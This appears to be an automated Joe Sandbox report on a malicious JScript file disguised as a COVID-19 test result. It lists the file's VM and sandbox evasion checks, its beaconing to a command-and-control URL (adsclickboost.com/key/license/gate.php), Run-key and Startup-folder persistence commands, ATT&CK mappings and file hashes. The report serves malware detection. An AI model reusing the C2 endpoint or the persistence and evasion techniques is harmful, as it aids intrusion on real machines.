Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6584	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6580	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6920	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6916	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 5368	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 5364	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6404	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6404	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: wscript.exe, 00000007.00000002.542143164.00000283388F0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.511647337.00000210EAB30000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 0000000D.00000003.316921260.00000210EAA0D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWP*
Source: wscript.exe, 00000001.00000003.284531161.000001F79267E000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.409791610.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.287766335.00000283363D2000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.406350357.00000210EAA4F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000007.00000002.542143164.00000283388F0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.511647337.00000210EAB30000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000007.00000002.542143164.00000283388F0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.511647337.00000210EAB30000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000004.00000003.269087910.000001EFB9DE2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000007.00000002.542143164.00000283388F0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.511647337.00000210EAB30000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Network Connect: 172.67.178.142 80			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.21.48.50 80			Jump to behavior

Source: wscript.exe, 00000004.00000002.523212489.000001EFB79D0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522531013.0000028336890000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.491914119.00000210E8C00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000004.00000002.523212489.000001EFB79D0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522531013.0000028336890000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.491914119.00000210E8C00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: wscript.exe, 00000004.00000002.523212489.000001EFB79D0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522531013.0000028336890000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.491914119.00000210E8C00000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: wscript.exe, 00000004.00000002.523212489.000001EFB79D0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522531013.0000028336890000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.491914119.00000210E8C00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: wscript.exe, 00000004.00000002.523212489.000001EFB79D0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522531013.0000028336890000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.491914119.00000210E8C00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting32	Startup Items1	Startup Items1	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Registry Run Keys / Startup Folder21	Process Injection12	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol112	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder21	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting32	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
COVID_19_Test_Result_Doctor_Note.js	0%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
adsclickboost.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://adsclickboost.com/U	0%	Avira URL Cloud	safe
http://adsclickboost.com/9aL	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpPJ	0%	Avira URL Cloud	safe
http://adsclickboost.com/12J	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.phph	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpP	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php&	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php.	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpPz	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php/	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php4	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpP4	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php4d%2fb	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpW	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.phpv	0%	Avira URL Cloud	safe
http://adsclickboost.com/9	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.php	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php;	0%	Avira URL Cloud	safe
https://waclickboost.com/	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php4d%2fID_19_Test_Result_Doctor_Note.js	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.phpB	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php	0%	Avira URL Cloud	safe
http://adsclickboost.com/e	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpPa	0%	Avira URL Cloud	safe
http://adsclickboost.com/	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php12J	0%	Avira URL Cloud	safe
http://adsclickboost.com/i	0%	Avira URL Cloud	safe
http://adsclickboost.com/h	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.phpP	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpPcY	0%	Avira URL Cloud	safe
http://adsclickboost.com/er	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpy	0%	Avira URL Cloud	safe
http://adsclickboost.com/l	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.phpO	0%	Avira URL Cloud	safe
http://adsclickboost.com/RJ0	0%	Avira URL Cloud	safe
http://adsclickboost.com/zJH	0%	Avira URL Cloud	safe
http://adsclickboost.com/1	0%	Avira URL Cloud	safe
http://adsclickboost.com/key/license/gate.php0DUq1z	0%	Avira URL Cloud	safe
http://adsclickboost.com:80/key/license/gate.phpPW	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
adsclickboost.com	104.21.48.50	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://adsclickboost.com/key/license/gate.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://adsclickboost.com/U	wscript.exe, 00000004.00000003.297771553.000001EFB9E34000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/9aL	wscript.exe, 00000001.00000003.318917408.000001F79268C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpPJ	wscript.exe, 00000004.00000003.461256392.000001EFB9E43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/12J	wscript.exe, 00000001.00000003.356081028.000001F792695000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.phph	wscript.exe, 0000000D.00000003.406308835.00000210EAA35000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpP	wscript.exe, 00000001.00000003.451204480.000001F7926E1000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.409791610.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.539332365.0000028338544000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.337151756.00000210EAA0D000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000002.511545541.00000210EAA6B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php&	wscript.exe, 0000000D.00000002.511362675.00000210EA9F5000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php.	wscript.exe, 00000007.00000003.408908678.0000028338572000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpPz	wscript.exe, 00000004.00000003.478595101.000001EFB9E3D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php/	wscript.exe, 00000001.00000003.356081028.000001F792695000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php4	wscript.exe, 00000007.00000002.539288266.0000028338535000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpP4	wscript.exe, 00000004.00000003.461256392.000001EFB9E43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php4d%2fb	wscript.exe, 00000004.00000002.488743713.000001EFB7372000.00000004.00000020.sdmp, wscript.exe, 00000007.00000002.522239743.0000028336342000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpW	wscript.exe, 00000004.00000003.315088682.000001EFB9E3D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.phpv	wscript.exe, 0000000D.00000003.427498683.00000210EAA35000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/9	wscript.exe, 00000004.00000003.369629621.000001EFB9E34000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.php	wscript.exe, 00000001.00000003.451204480.000001F7926E1000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.375631367.000001F7926E1000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.334316047.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.426945749.0000028338599000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.381487439.00000210EAA4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php;	wscript.exe, 00000001.00000003.416757833.000001F7926AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://waclickboost.com/	wscript.exe, 00000001.00000003.434766513.000001F792675000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.467159682.00000210EAA82000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php4d%2fID_19_Test_Result_Doctor_Note.js	wscript.exe, 0000000D.00000002.491234203.00000210E86A1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.phpB	wscript.exe, 0000000D.00000003.337246961.00000210EAA35000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.381444898.00000210EAA35000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpp	wscript.exe, 0000000D.00000002.511545541.00000210EAA6B000.00000004.00000001.sdmp	false		unknown
http://adsclickboost.com/e	wscript.exe, 00000004.00000003.390681019.000001EFB9E34000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpPa	wscript.exe, 00000001.00000003.318818802.000001F7926E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/	wscript.exe, 00000004.00000003.409791610.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.269140453.000001EFB9E01000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.408789200.0000028338590000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.539332365.0000028338544000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000002.511576753.00000210EAA81000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.381608799.00000210E873B000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.317168248.00000210EAA1D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php12J	wscript.exe, 00000001.00000003.416646676.000001F792695000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/i	wscript.exe, 00000004.00000003.461098244.000001EFB9E3D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/h	wscript.exe, 00000001.00000003.434803794.000001F79268C000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.461098244.000001EFB9E3D000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.539332365.0000028338544000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.phpP	wscript.exe, 0000000D.00000003.358717656.00000210EAA13000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpPcY	wscript.exe, 00000007.00000002.539429799.000002833858B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/er	wscript.exe, 00000001.00000003.338715180.000001F79268C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpy	wscript.exe, 00000004.00000003.461256392.000001EFB9E43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/l	wscript.exe, 00000001.00000003.469496295.000001F792695000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.408908678.0000028338572000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.phpO	wscript.exe, 00000004.00000003.409765695.000001EFB9E27000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/RJ0	wscript.exe, 00000001.00000003.232143310.000001F792695000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/zJH	wscript.exe, 00000001.00000003.338726572.000001F792695000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/1	wscript.exe, 00000001.00000003.416646676.000001F792695000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com/key/license/gate.php0DUq1z	wscript.exe, 00000001.00000003.469238846.000001F792675000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpPW	wscript.exe, 0000000D.00000003.381487439.00000210EAA4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://adsclickboost.com:80/key/license/gate.phpw	wscript.exe, 00000001.00000003.283704504.000001F7926E1000.00000004.00000001.sdmp	false		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.50	adsclickboost.com	United States		13335	CLOUDFLARENETUS	true
172.67.178.142	unknown	United States		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	365159
Start date:	09.03.2021
Start time:	09:19:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	COVID_19_Test_Result_Doctor_Note.js
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winJS@4/10@47/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .js
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 168.61.161.212, 13.88.21.125, 184.30.24.56, 51.104.139.180, 104.42.151.234, 51.103.5.186, 92.122.213.194, 92.122.213.247, 52.147.198.201, 20.54.26.129, 51.11.168.160, 104.43.193.48, 52.255.188.83, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:20:14	API Interceptor	93x Sleep call for process: wscript.exe modified
09:20:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run COVID_19_Test_Result_Doctor_Note wscript.exe //B "C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js"
09:20:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run COVID_19_Test_Result_Doctor_Note wscript.exe //B "C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js"
09:20:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.48.50	COVID_19_Test_Result_Doctor_Note.js	Get hash	malicious	Browse	adsclickboost.com/key/license/gate.php
104.21.48.50	license.vbs	Get hash	malicious	Browse	adsclickboost.com/key/license/gate.php
172.67.178.142	COVID_19_Test_Result_Doctor_Note.js	Get hash	malicious	Browse	adsclickboost.com/key/license/gate.php
172.67.178.142	license.vbs	Get hash	malicious	Browse	adsclickboost.com/key/license/gate.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
adsclickboost.com	license.vbs	Get hash	malicious	Browse	172.67.178.142

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	COVID_19_Test_Result_Doctor_Note.js	Get hash	malicious	Browse	172.67.178.142
	Order #2743668.doc	Get hash	malicious	Browse	23.227.38.74
	DOC_457800_366776_3673636_76638-737979.DOC.EXE	Get hash	malicious	Browse	104.21.31.39
	YZ09cQE8tb.vbs	Get hash	malicious	Browse	162.159.134.233
	PL.exe	Get hash	malicious	Browse	104.21.53.146
	7msgsbG4HJ.dll	Get hash	malicious	Browse	104.21.52.146
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.C2C1C6E0.Gen.19261.xlsm	Get hash	malicious	Browse	104.21.27.249
	korea09.ocx	Get hash	malicious	Browse	104.20.184.68
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.13971CEE.Gen.7989.xlsm	Get hash	malicious	Browse	172.67.139.211
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.13971CEE.Gen.7989.xlsm	Get hash	malicious	Browse	104.21.62.221
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.13971CEE.Gen.7989.xlsm	Get hash	malicious	Browse	172.67.139.211
	license.vbs	Get hash	malicious	Browse	172.67.178.142
	2021-03-08-Spelevo-EK-payload-ZLoader-EXE.dll	Get hash	malicious	Browse	104.20.184.68
	ACH PAYYMENT FOR PO#INV667345.html	Get hash	malicious	Browse	104.16.19.94
	Statement-ID-(40450421).vbs	Get hash	malicious	Browse	162.159.135.233
	nova proforma.exe	Get hash	malicious	Browse	162.159.133.233
	SpaceXStarbaseInvite.xlsm	Get hash	malicious	Browse	104.21.41.103
	bXSINeHUUZ.dll	Get hash	malicious	Browse	104.26.28.246
	FFSetup5.6.5.0.exe	Get hash	malicious	Browse	104.18.88.101
	Chrome3.7.1.apk	Get hash	malicious	Browse	104.18.10.207
CLOUDFLARENETUS	COVID_19_Test_Result_Doctor_Note.js	Get hash	malicious	Browse	172.67.178.142
	Order #2743668.doc	Get hash	malicious	Browse	23.227.38.74
	DOC_457800_366776_3673636_76638-737979.DOC.EXE	Get hash	malicious	Browse	104.21.31.39
	YZ09cQE8tb.vbs	Get hash	malicious	Browse	162.159.134.233
	PL.exe	Get hash	malicious	Browse	104.21.53.146
	7msgsbG4HJ.dll	Get hash	malicious	Browse	104.21.52.146
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.C2C1C6E0.Gen.19261.xlsm	Get hash	malicious	Browse	104.21.27.249
	korea09.ocx	Get hash	malicious	Browse	104.20.184.68
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.13971CEE.Gen.7989.xlsm	Get hash	malicious	Browse	172.67.139.211
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.13971CEE.Gen.7989.xlsm	Get hash	malicious	Browse	104.21.62.221
	SecuriteInfo.com.VB.Heur2.EmoDldr.16.13971CEE.Gen.7989.xlsm	Get hash	malicious	Browse	172.67.139.211
	license.vbs	Get hash	malicious	Browse	172.67.178.142
	2021-03-08-Spelevo-EK-payload-ZLoader-EXE.dll	Get hash	malicious	Browse	104.20.184.68
	ACH PAYYMENT FOR PO#INV667345.html	Get hash	malicious	Browse	104.16.19.94
	Statement-ID-(40450421).vbs	Get hash	malicious	Browse	162.159.135.233
	nova proforma.exe	Get hash	malicious	Browse	162.159.133.233
	SpaceXStarbaseInvite.xlsm	Get hash	malicious	Browse	104.21.41.103
	bXSINeHUUZ.dll	Get hash	malicious	Browse	104.26.28.246
	FFSetup5.6.5.0.exe	Get hash	malicious	Browse	104.18.88.101
	Chrome3.7.1.apk	Get hash	malicious	Browse	104.18.10.207

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	121302
Entropy (8bit):	5.728503884778436
Encrypted:	false
SSDEEP:	1536:nDr87Dr87Dr87Dr87Dr87Dr87Dr87Dr87Dr87:nDrUDrUDrUDrUDrUDrUDrUDrUDr8
MD5:	91470782C047D7D873C54E2C43837082
SHA1:	8A84731322ED4A8512CD4BB9C83F1D385B796CA0
SHA-256:	CB730108A47CCB48B71536BB51DA14BDBCB4C504E75F9ABF26C9A68C331547A3
SHA-512:	4814F855868C422452250A4EF1902BF874486DEB8FC42DD6F527C326B7B2D7DF85E8B5710238ACF2A2D8748698A3E7FF9CBBED5FE2D8056B16746CB970339DE4
Malicious:	true
Reputation:	low
